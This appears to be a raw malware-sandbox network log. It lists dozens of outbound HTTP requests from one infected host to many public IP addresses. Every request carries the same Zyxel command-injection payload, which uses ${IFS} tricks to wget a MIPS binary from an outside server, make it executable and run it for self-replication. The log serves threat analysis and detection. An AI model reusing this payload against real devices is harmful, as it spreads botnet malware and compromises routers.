                                                      Feb 2, 2024 06:36:13.069221973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9255192.168.2.145694695.145.170.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069255114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9256192.168.2.144082295.59.110.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069307089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9257192.168.2.1449980210.140.122.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069366932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9258192.168.2.144455650.205.36.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069403887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9259192.168.2.1447396196.132.18.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069444895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9260192.168.2.1444972158.230.197.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069498062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9261192.168.2.145095636.239.151.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069540024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9262192.168.2.14485522.166.58.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069562912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9263192.168.2.144484038.15.140.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069616079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9264192.168.2.1433792220.125.195.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069653034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9265192.168.2.145000468.104.115.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069698095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9266192.168.2.1441812179.55.154.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069751024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9267192.168.2.144951440.113.197.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069768906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9268192.168.2.1457154119.45.40.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069813967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9269192.168.2.1437090200.34.166.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069825888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9270192.168.2.1459836139.207.168.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069895983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9271192.168.2.1441468223.255.131.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069915056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9272192.168.2.1437224146.77.135.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069952011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9273192.168.2.143620463.77.50.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069998026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9274192.168.2.1434192155.154.157.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070030928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9275192.168.2.143281041.42.175.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070067883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9276192.168.2.1450408143.85.118.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070118904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9277192.168.2.144238868.169.45.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070142984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9278192.168.2.145294880.193.232.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070179939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9279192.168.2.1433806207.251.226.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070225000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9280192.168.2.1442902149.134.15.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070255995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9281192.168.2.143584625.39.215.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070303917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9282192.168.2.1432866159.127.6.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070336103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9283192.168.2.1441274143.27.176.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070389032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9284192.168.2.1436878193.138.110.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070421934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9285192.168.2.1433906210.44.247.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070471048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9286192.168.2.144902882.78.38.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070513010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9287192.168.2.1456758211.251.174.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070550919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9288192.168.2.1437128178.162.17.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070596933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9289192.168.2.143292059.239.103.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070646048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9290192.168.2.1446890119.50.242.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070683956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9291192.168.2.1450884137.122.75.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070724964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9292192.168.2.144627434.228.231.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070754051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9293192.168.2.1437030200.142.166.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070810080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9294192.168.2.144402072.236.215.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070841074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9295192.168.2.144446079.212.107.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070883036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9296192.168.2.144908492.52.84.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070933104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9297192.168.2.1451286136.124.75.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.070977926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9298192.168.2.1456284140.145.35.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071002960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9299192.168.2.144979658.204.191.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071031094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9300192.168.2.1454396213.62.73.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071093082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9301192.168.2.1433746211.109.77.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071131945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9302192.168.2.1443230159.230.126.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071183920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9303192.168.2.1443120148.250.172.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071218014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9304192.168.2.145800431.133.90.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071273088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9305192.168.2.145085634.232.232.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071320057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9306192.168.2.1445002103.146.163.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071365118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9307192.168.2.1437818109.47.236.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071408987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9308192.168.2.1460256165.96.230.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071440935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9309192.168.2.143650289.60.33.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071481943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9310192.168.2.1460814171.188.84.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071542978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9311192.168.2.143914653.27.148.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071589947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9312192.168.2.1449090108.181.130.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071618080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9313192.168.2.144024041.13.130.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071672916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9314192.168.2.14545922.73.33.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071719885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9315192.168.2.1456098134.227.156.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071732044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9316192.168.2.1434544135.255.59.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071778059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9317192.168.2.143779835.252.32.206443
                                                      TimestampBytes transferredDirectionData
